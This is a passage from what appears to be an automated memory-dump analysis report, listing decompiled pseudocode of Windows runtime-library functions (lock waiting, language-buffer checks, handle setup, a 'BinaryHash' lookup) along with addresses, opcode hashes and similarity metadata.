                                                                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                        																						__eflags =  *_t68;
                                                                        																						_t91 =  *(_t177 + 0x20);
                                                                        																						goto L74;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																			goto L35;
                                                                        																		} else {
                                                                        																			__eflags = _t141;
                                                                        																			if(_t141 != 0) {
                                                                        																				_t177 = E0150FD22(_t177);
                                                                        																				__eflags = _t177;
                                                                        																				if(_t177 == 0) {
                                                                        																					L42:
                                                                        																					_t77 = 0xc0000001;
                                                                        																					goto L33;
                                                                        																				} else {
                                                                        																					_t130 = E0150FD9B(_t177, 0, 4);
                                                                        																					__eflags = _t130;
                                                                        																					if(_t130 != 0) {
                                                                        																						goto L42;
                                                                        																					} else {
                                                                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                        																						_t91 =  *(_t177 + 0x20);
                                                                        																						goto L26;
                                                                        																					}
                                                                        																				}
                                                                        																				goto L35;
                                                                        																			} else {
                                                                        																				L26:
                                                                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                        																				__eflags = _t94;
                                                                        																				L27:
                                                                        																				 *(_t177 + 0x20) = _t94;
                                                                        																				__eflags = _t170 & 0x00008000;
                                                                        																				if((_t170 & 0x00008000) != 0) {
                                                                        																					_t95 = _a12;
                                                                        																					__eflags = _t95;
                                                                        																					if(_t95 != 0) {
                                                                        																						_t96 =  *_t95;
                                                                        																						__eflags = _t96;
                                                                        																						if(_t96 != 0) {
                                                                        																							 *((short*)(_t177 + 0x22)) = 0;
                                                                        																							_t40 = _t177 + 0x20;
                                                                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                        																							__eflags =  *_t40;
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				goto L31;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                        														_t106 =  *(_t147 + 0x20);
                                                                        														__eflags = _t106 & 0x00000040;
                                                                        														if((_t106 & 0x00000040) != 0) {
                                                                        															_t147 = E0150FD22(_t147);
                                                                        															__eflags = _t147;
                                                                        															if(_t147 == 0) {
                                                                        																L41:
                                                                        																_t130 = 0xc0000001;
                                                                        																L32:
                                                                        																_t77 = _t130;
                                                                        																goto L33;
                                                                        															} else {
                                                                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                        																_t106 =  *(_t147 + 0x20);
                                                                        																goto L17;
                                                                        															}
                                                                        															goto L35;
                                                                        														} else {
                                                                        															L17:
                                                                        															_t108 = _t106 | 0x00000080;
                                                                        															__eflags = _t108;
                                                                        															 *(_t147 + 0x20) = _t108;
                                                                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                        															goto L18;
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        											L33:
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L35:
                                                                        						return _t77;
                                                                        					} else {
                                                                        						 *_t75 = 0x15c7b80;
                                                                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                        						 *_t134 = _t75;
                                                                        						 *0x15c7b84 = _t75;
                                                                        						_t73 = E014EEB70(_t134, 0x15c7b60);
                                                                        						if( *0x15c7b20 != 0) {
                                                                        							_t73 =  *( *[fs:0x30] + 0xc);
                                                                        							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                        								_t73 = E014EFF60( *0x15c7b20);
                                                                        							}
                                                                        						}
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x0150fccd
                                                                        0x00000000
                                                                        0x0150fccd
                                                                        0x0150fcc7
                                                                        0x00000000
                                                                        0x0150fc4b
                                                                        0x0150fc4b
                                                                        0x0150fc4e
                                                                        0x0150fc4e
                                                                        0x0150fc51
                                                                        0x0150fc51
                                                                        0x0150fc54
                                                                        0x0150fc5a
                                                                        0x0150fc5c
                                                                        0x0150fc5f
                                                                        0x0150fc61
                                                                        0x0150fc63
                                                                        0x0150fc65
                                                                        0x0150fc67
                                                                        0x0150fc6e
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc67
                                                                        0x0150fc61
                                                                        0x00000000
                                                                        0x0150fc5a
                                                                        0x0150fc49
                                                                        0x0150fc41
                                                                        0x0150fc30
                                                                        0x0150fc27
                                                                        0x0150fc03
                                                                        0x0150fbcd
                                                                        0x0150fbd3
                                                                        0x0150fbd9
                                                                        0x0150fbdc
                                                                        0x0150fbde
                                                                        0x0150fc99
                                                                        0x0150fc9b
                                                                        0x0150fc9d
                                                                        0x0150fcd5
                                                                        0x0150fcd5
                                                                        0x0150fc89
                                                                        0x0150fc89
                                                                        0x00000000
                                                                        0x0150fc9f
                                                                        0x0150fc9f
                                                                        0x0150fca3
                                                                        0x00000000
                                                                        0x0150fca3
                                                                        0x00000000
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe9
                                                                        0x0150fbf2
                                                                        0x00000000
                                                                        0x0150fbf2
                                                                        0x0150fbde
                                                                        0x0150fbcb
                                                                        0x0150fbab
                                                                        0x0150fc8b
                                                                        0x0150fc8b
                                                                        0x0150fc8c
                                                                        0x0150fb80
                                                                        0x0150fb72
                                                                        0x0150fb5e
                                                                        0x0150fc8d
                                                                        0x0150fc91
                                                                        0x0150fadf
                                                                        0x0150fadf
                                                                        0x0150fae1
                                                                        0x0150fae4
                                                                        0x0150fae7
                                                                        0x0150faec
                                                                        0x0150faf8
                                                                        0x0150fb00
                                                                        0x0150fb07
                                                                        0x0150fb0f
                                                                        0x0150fb0f
                                                                        0x0150fb07
                                                                        0x00000000
                                                                        0x0150faf8
                                                                        0x0150fadd

                                                                        Strings
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0154BE0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                        • API String ID: 0-865735534
                                                                        • Opcode ID: 41d08f2b26ceeb3efed5c4a7b151db6e11083ff66a9dbbce502f4492095b203d
                                                                        • Instruction ID: 307ed415eedc9e5273c214e27b8dd8c52215d96facef7024fef7ef343a08129f
                                                                        • Opcode Fuzzy Hash: 41d08f2b26ceeb3efed5c4a7b151db6e11083ff66a9dbbce502f4492095b203d
                                                                        • Instruction Fuzzy Hash: 60A1F171A04A069FEB36CFA9C455B7EB7E4BF88724F04456EE9468F6D0DB30D8418B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E014D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                        				signed char _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				signed int _v52;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t55;
                                                                        				signed int _t57;
                                                                        				signed int _t58;
                                                                        				char* _t62;
                                                                        				signed char* _t63;
                                                                        				signed char* _t64;
                                                                        				signed int _t67;
                                                                        				signed int _t72;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				signed int _t88;
                                                                        				intOrPtr _t89;
                                                                        				signed char _t93;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				signed int _t102;
                                                                        				signed int _t103;
                                                                        				intOrPtr _t104;
                                                                        				signed int _t105;
                                                                        				signed int _t106;
                                                                        				signed char _t109;
                                                                        				signed int _t111;
                                                                        				void* _t116;
                                                                        
                                                                        				_t102 = __edi;
                                                                        				_t97 = __edx;
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t55 =  *[fs:0x18];
                                                                        				_t109 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t86 = 0;
                                                                        				_v32 = _t55;
                                                                        				_v24 = 0;
                                                                        				_push(__edi);
                                                                        				if(__ecx == 0x15c5350) {
                                                                        					_t86 = 1;
                                                                        					_v24 = 1;
                                                                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                        				}
                                                                        				_t103 = _t102 | 0xffffffff;
                                                                        				if( *0x15c7bc8 != 0) {
                                                                        					_push(0xc000004b);
                                                                        					_push(_t103);
                                                                        					E015197C0();
                                                                        				}
                                                                        				if( *0x15c79c4 != 0) {
                                                                        					_t57 = 0;
                                                                        				} else {
                                                                        					_t57 = 0x15c79c8;
                                                                        				}
                                                                        				_v16 = _t57;
                                                                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                        					_t93 = _t109;
                                                                        					L23();
                                                                        				}
                                                                        				_t58 =  *_t109;
                                                                        				if(_t58 == _t103) {
                                                                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                        					_t58 = _t103;
                                                                        					if(__eflags == 0) {
                                                                        						_t93 = _t109;
                                                                        						E01501624(_t86, __eflags);
                                                                        						_t58 =  *_t109;
                                                                        					}
                                                                        				}
                                                                        				_v20 = _v20 & 0x00000000;
                                                                        				if(_t58 != _t103) {
                                                                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                        				}
                                                                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                        				_t88 = _v16;
                                                                        				_v28 = _t104;
                                                                        				L9:
                                                                        				while(1) {
                                                                        					if(E014F7D50() != 0) {
                                                                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                        					} else {
                                                                        						_t62 = 0x7ffe0382;
                                                                        					}
                                                                        					if( *_t62 != 0) {
                                                                        						_t63 =  *[fs:0x30];
                                                                        						__eflags = _t63[0x240] & 0x00000002;
                                                                        						if((_t63[0x240] & 0x00000002) != 0) {
                                                                        							_t93 = _t109;
                                                                        							E0156FE87(_t93);
                                                                        						}
                                                                        					}
                                                                        					if(_t104 != 0xffffffff) {
                                                                        						_push(_t88);
                                                                        						_push(0);
                                                                        						_push(_t104);
                                                                        						_t64 = E01519520();
                                                                        						goto L15;
                                                                        					} else {
                                                                        						while(1) {
                                                                        							_t97 =  &_v8;
                                                                        							_t64 = E0150E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                        							if(_t64 == 0x102) {
                                                                        								break;
                                                                        							}
                                                                        							_t93 =  *(_t109 + 4);
                                                                        							_v8 = _t93;
                                                                        							if((_t93 & 0x00000002) != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							L15:
                                                                        							if(_t64 == 0x102) {
                                                                        								break;
                                                                        							}
                                                                        							_t89 = _v24;
                                                                        							if(_t64 < 0) {
                                                                        								L0152DF30(_t93, _t97, _t64);
                                                                        								_push(_t93);
                                                                        								_t98 = _t97 | 0xffffffff;
                                                                        								__eflags =  *0x15c6901;
                                                                        								_push(_t109);
                                                                        								_v52 = _t98;
                                                                        								if( *0x15c6901 != 0) {
                                                                        									_push(0);
                                                                        									_push(1);
                                                                        									_push(0);
                                                                        									_push(0x100003);
                                                                        									_push( &_v12);
                                                                        									_t72 = E01519980();
                                                                        									__eflags = _t72;
                                                                        									if(_t72 < 0) {
                                                                        										_v12 = _t98 | 0xffffffff;
                                                                        									}
                                                                        								}
                                                                        								asm("lock cmpxchg [ecx], edx");
                                                                        								_t111 = 0;
                                                                        								__eflags = 0;
                                                                        								if(0 != 0) {
                                                                        									__eflags = _v12 - 0xffffffff;
                                                                        									if(_v12 != 0xffffffff) {
                                                                        										_push(_v12);
                                                                        										E015195D0();
                                                                        									}
                                                                        								} else {
                                                                        									_t111 = _v12;
                                                                        								}
                                                                        								return _t111;
                                                                        							} else {
                                                                        								if(_t89 != 0) {
                                                                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                        									_t77 = E014F7D50();
                                                                        									__eflags = _t77;
                                                                        									if(_t77 == 0) {
                                                                        										_t64 = 0x7ffe0384;
                                                                        									} else {
                                                                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                        									}
                                                                        									__eflags =  *_t64;
                                                                        									if( *_t64 != 0) {
                                                                        										_t64 =  *[fs:0x30];
                                                                        										__eflags = _t64[0x240] & 0x00000004;
                                                                        										if((_t64[0x240] & 0x00000004) != 0) {
                                                                        											_t78 = E014F7D50();
                                                                        											__eflags = _t78;
                                                                        											if(_t78 == 0) {
                                                                        												_t64 = 0x7ffe0385;
                                                                        											} else {
                                                                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                        											}
                                                                        											__eflags =  *_t64 & 0x00000020;
                                                                        											if(( *_t64 & 0x00000020) != 0) {
                                                                        												_t64 = E01557016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								return _t64;
                                                                        							}
                                                                        						}
                                                                        						_t97 = _t88;
                                                                        						_t93 = _t109;
                                                                        						E0156FDDA(_t97, _v12);
                                                                        						_t105 =  *_t109;
                                                                        						_t67 = _v12 + 1;
                                                                        						_v12 = _t67;
                                                                        						__eflags = _t105 - 0xffffffff;
                                                                        						if(_t105 == 0xffffffff) {
                                                                        							_t106 = 0;
                                                                        							__eflags = 0;
                                                                        						} else {
                                                                        							_t106 =  *(_t105 + 0x14);
                                                                        						}
                                                                        						__eflags = _t67 - 2;
                                                                        						if(_t67 > 2) {
                                                                        							__eflags = _t109 - 0x15c5350;
                                                                        							if(_t109 != 0x15c5350) {
                                                                        								__eflags = _t106 - _v20;
                                                                        								if(__eflags == 0) {
                                                                        									_t93 = _t109;
                                                                        									E0156FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_push("RTL: Re-Waiting\n");
                                                                        						_push(0);
                                                                        						_push(0x65);
                                                                        						_v20 = _t106;
                                                                        						E01565720();
                                                                        						_t104 = _v28;
                                                                        						_t116 = _t116 + 0xc;
                                                                        						continue;
                                                                        					}
                                                                        				}
                                                                        			}





































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Re-Waiting
                                                                        • API String ID: 0-316354757
                                                                        • Opcode ID: a9890a74c02c3ccf649a9d33e2f3d0ee04f85fcd74a9345ccb5fe10452e77394
                                                                        • Instruction ID: c3887e0c85ff74f1384e5f71a103ff35a80a22c95a2be64e14e63b68b42f6570
                                                                        • Opcode Fuzzy Hash: a9890a74c02c3ccf649a9d33e2f3d0ee04f85fcd74a9345ccb5fe10452e77394
                                                                        • Instruction Fuzzy Hash: 19615332A006119FEB22CF6CD860B7EBBB4FB46720F14066BD9119B2E1C7B499028781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E015A0EA5(void* __ecx, void* __edx) {
                                                                        				signed int _v20;
                                                                        				char _v24;
                                                                        				intOrPtr _v28;
                                                                        				unsigned int _v32;
                                                                        				signed int _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				intOrPtr _v64;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				signed int _t58;
                                                                        				unsigned int _t60;
                                                                        				intOrPtr _t62;
                                                                        				char* _t67;
                                                                        				char* _t69;
                                                                        				void* _t80;
                                                                        				void* _t83;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t115;
                                                                        				char _t117;
                                                                        				void* _t120;
                                                                        
                                                                        				_t83 = __edx;
                                                                        				_t117 = 0;
                                                                        				_t120 = __ecx;
                                                                        				_v44 = 0;
                                                                        				if(E0159FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                        					L24:
                                                                        					_t109 = _v44;
                                                                        					if(_v44 != 0) {
                                                                        						E015A1074(_t83, _t120, _t109, _t117, _t117);
                                                                        					}
                                                                        					L26:
                                                                        					return _t117;
                                                                        				}
                                                                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                        				_t5 = _t83 + 1; // 0x1
                                                                        				_v36 = _t5 << 0xc;
                                                                        				_v40 = _t93;
                                                                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                        				asm("sbb ebx, ebx");
                                                                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                        				if(_t58 != 0) {
                                                                        					_push(0);
                                                                        					_push(0x14);
                                                                        					_push( &_v24);
                                                                        					_push(3);
                                                                        					_push(_t93);
                                                                        					_push(0xffffffff);
                                                                        					_t80 = E01519730();
                                                                        					_t115 = _v64;
                                                                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                        						_push(_t93);
                                                                        						E0159A80D(_t115, 1, _v20, _t117);
                                                                        						_t83 = 4;
                                                                        					}
                                                                        				}
                                                                        				if(E0159A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                        					goto L24;
                                                                        				}
                                                                        				_t60 = _v32;
                                                                        				_t97 = (_t60 != 0x100000) + 1;
                                                                        				_t83 = (_v44 -  *0x15c8b04 >> 0x14) + (_v44 -  *0x15c8b04 >> 0x14);
                                                                        				_v28 = (_t60 != 0x100000) + 1;
                                                                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                        				_v40 = _t62;
                                                                        				if(_t83 >= _t62) {
                                                                        					L10:
                                                                        					asm("lock xadd [eax], ecx");
                                                                        					asm("lock xadd [eax], ecx");
                                                                        					if(E014F7D50() == 0) {
                                                                        						_t67 = 0x7ffe0380;
                                                                        					} else {
                                                                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        					}
                                                                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                        						E0159138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                        					}
                                                                        					if(E014F7D50() == 0) {
                                                                        						_t69 = 0x7ffe0388;
                                                                        					} else {
                                                                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                        					}
                                                                        					if( *_t69 != 0) {
                                                                        						E0158FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                        					}
                                                                        					if(( *0x15c8724 & 0x00000008) != 0) {
                                                                        						E015952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                        					}
                                                                        					_t117 = _v44;
                                                                        					goto L26;
                                                                        				}
                                                                        				while(E015A15B5(0x15c8ae4, _t83, _t97, _t97) >= 0) {
                                                                        					_t97 = _v28;
                                                                        					_t83 = _t83 + 2;
                                                                        					if(_t83 < _v40) {
                                                                        						continue;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        				goto L24;
                                                                        			}

























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: f167bea6ec8b7667d7b6bcdf4703654b2ff3335e73d84e00c69d1d363f522c4c
                                                                        • Instruction ID: ed0b825f285020f853ec256b26bcfb9af6d9ee9f0f9a654e8cc23568c30de934
                                                                        • Opcode Fuzzy Hash: f167bea6ec8b7667d7b6bcdf4703654b2ff3335e73d84e00c69d1d363f522c4c
                                                                        • Instruction Fuzzy Hash: ED51BA702847428FE725DF28D9C0B1FBBE9FBC4214F44092DFA929B290D670E805CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0150F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				char* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				char _v36;
                                                                        				char _v44;
                                                                        				char _v52;
                                                                        				intOrPtr _v56;
                                                                        				char _v60;
                                                                        				intOrPtr _v72;
                                                                        				void* _t51;
                                                                        				void* _t58;
                                                                        				signed short _t82;
                                                                        				short _t84;
                                                                        				signed int _t91;
                                                                        				signed int _t100;
                                                                        				signed short* _t103;
                                                                        				void* _t108;
                                                                        				intOrPtr* _t109;
                                                                        
                                                                        				_t103 = __ecx;
                                                                        				_t82 = __edx;
                                                                        				_t51 = E014F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                        				if(_t51 >= 0) {
                                                                        					_push(0x21);
                                                                        					_push(3);
                                                                        					_v56 =  *0x7ffe02dc;
                                                                        					_v20 =  &_v52;
                                                                        					_push( &_v44);
                                                                        					_v28 = 0x18;
                                                                        					_push( &_v28);
                                                                        					_push(0x100020);
                                                                        					_v24 = 0;
                                                                        					_push( &_v60);
                                                                        					_v16 = 0x40;
                                                                        					_v12 = 0;
                                                                        					_v8 = 0;
                                                                        					_t58 = E01519830();
                                                                        					_t87 =  *[fs:0x30];
                                                                        					_t108 = _t58;
                                                                        					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                        					if(_t108 < 0) {
                                                                        						L11:
                                                                        						_t51 = _t108;
                                                                        					} else {
                                                                        						_push(4);
                                                                        						_push(8);
                                                                        						_push( &_v36);
                                                                        						_push( &_v44);
                                                                        						_push(_v60);
                                                                        						_t108 = E01519990();
                                                                        						if(_t108 < 0) {
                                                                        							L10:
                                                                        							_push(_v60);
                                                                        							E015195D0();
                                                                        							goto L11;
                                                                        						} else {
                                                                        							_t109 = L014F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                        							if(_t109 == 0) {
                                                                        								_t108 = 0xc0000017;
                                                                        								goto L10;
                                                                        							} else {
                                                                        								_t21 = _t109 + 0x18; // 0x18
                                                                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                        								 *_t109 = 1;
                                                                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                        								 *(_t109 + 0xe) = _t82;
                                                                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                        								E0151F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                        								_t91 =  *_t103 & 0x0000ffff;
                                                                        								_t100 = _t91 & 0xfffffffe;
                                                                        								_t84 = 0x5c;
                                                                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                        										_push(_v60);
                                                                        										E015195D0();
                                                                        										L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                        										_t51 = 0xc0000106;
                                                                        									} else {
                                                                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                        										goto L5;
                                                                        									}
                                                                        								} else {
                                                                        									L5:
                                                                        									 *_a4 = _t109;
                                                                        									_t51 = 0;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t51;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction ID: e1b1142abe78e198a8aa89f64fe67ecca10c031f19dc684c07995e1f5670ee9d
                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction Fuzzy Hash: A251B071104711AFD321DF59C841A6BBBF8FF98714F00892EFA959B6A0E7B4E904CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E01553540(intOrPtr _a4) {
                                                                        				signed int _v12;
                                                                        				intOrPtr _v88;
                                                                        				intOrPtr _v92;
                                                                        				char _v96;
                                                                        				char _v352;
                                                                        				char _v1072;
                                                                        				intOrPtr _v1140;
                                                                        				intOrPtr _v1148;
                                                                        				char _v1152;
                                                                        				char _v1156;
                                                                        				char _v1160;
                                                                        				char _v1164;
                                                                        				char _v1168;
                                                                        				char* _v1172;
                                                                        				short _v1174;
                                                                        				char _v1176;
                                                                        				char _v1180;
                                                                        				char _v1192;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				short _t41;
                                                                        				short _t42;
                                                                        				intOrPtr _t80;
                                                                        				intOrPtr _t81;
                                                                        				signed int _t82;
                                                                        				void* _t83;
                                                                        
                                                                        				_v12 =  *0x15cd360 ^ _t82;
                                                                        				_t41 = 0x14;
                                                                        				_v1176 = _t41;
                                                                        				_t42 = 0x16;
                                                                        				_v1174 = _t42;
                                                                        				_v1164 = 0x100;
                                                                        				_v1172 = L"BinaryHash";
                                                                        				_t81 = E01510BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                        				if(_t81 < 0) {
                                                                        					L11:
                                                                        					_t75 = _t81;
                                                                        					E01553706(0, _t81, _t79, _t80);
                                                                        					L12:
                                                                        					if(_a4 != 0xc000047f) {
                                                                        						E0151FA60( &_v1152, 0, 0x50);
                                                                        						_v1152 = 0x60c201e;
                                                                        						_v1148 = 1;
                                                                        						_v1140 = E01553540;
                                                                        						E0151FA60( &_v1072, 0, 0x2cc);
                                                                        						_push( &_v1072);
                                                                        						E0152DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                        						E01560C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                        						_push(_v1152);
                                                                        						_push(0xffffffff);
                                                                        						E015197C0();
                                                                        					}
                                                                        					return E0151B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                        				}
                                                                        				_t79 =  &_v352;
                                                                        				_t81 = E01553971(0, _a4,  &_v352,  &_v1156);
                                                                        				if(_t81 < 0) {
                                                                        					goto L11;
                                                                        				}
                                                                        				_t75 = _v1156;
                                                                        				_t79 =  &_v1160;
                                                                        				_t81 = E01553884(_v1156,  &_v1160,  &_v1168);
                                                                        				if(_t81 >= 0) {
                                                                        					_t80 = _v1160;
                                                                        					E0151FA60( &_v96, 0, 0x50);
                                                                        					_t83 = _t83 + 0xc;
                                                                        					_push( &_v1180);
                                                                        					_push(0x50);
                                                                        					_push( &_v96);
                                                                        					_push(2);
                                                                        					_push( &_v1176);
                                                                        					_push(_v1156);
                                                                        					_t81 = E01519650();
                                                                        					if(_t81 >= 0) {
                                                                        						if(_v92 != 3 || _v88 == 0) {
                                                                        							_t81 = 0xc000090b;
                                                                        						}
                                                                        						if(_t81 >= 0) {
                                                                        							_t75 = _a4;
                                                                        							_t79 =  &_v352;
                                                                        							E01553787(_a4,  &_v352, _t80);
                                                                        						}
                                                                        					}
                                                                        					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                        				}
                                                                        				_push(_v1156);
                                                                        				E015195D0();
                                                                        				if(_t81 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}
































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 7c4763ecb9c2393cad8b1e59847cfa9c16bb63acacfdfbd0fabc867e26e6726d
                                                                        • Instruction ID: 91f10ea3b0a7d0b9dab60e5dd5b1711f62f82f2a6b7fdbe1ba87d9715135fc52
                                                                        • Opcode Fuzzy Hash: 7c4763ecb9c2393cad8b1e59847cfa9c16bb63acacfdfbd0fabc867e26e6726d
                                                                        • Instruction Fuzzy Hash: 3B4135B2D0052E9BDB619A50CC90FDEB77CBB54754F0045A6EA09AF240DB309E88CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E015A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                        				signed int _v20;
                                                                        				char _v24;
                                                                        				signed int _v28;
                                                                        				char _v32;
                                                                        				signed int _v36;
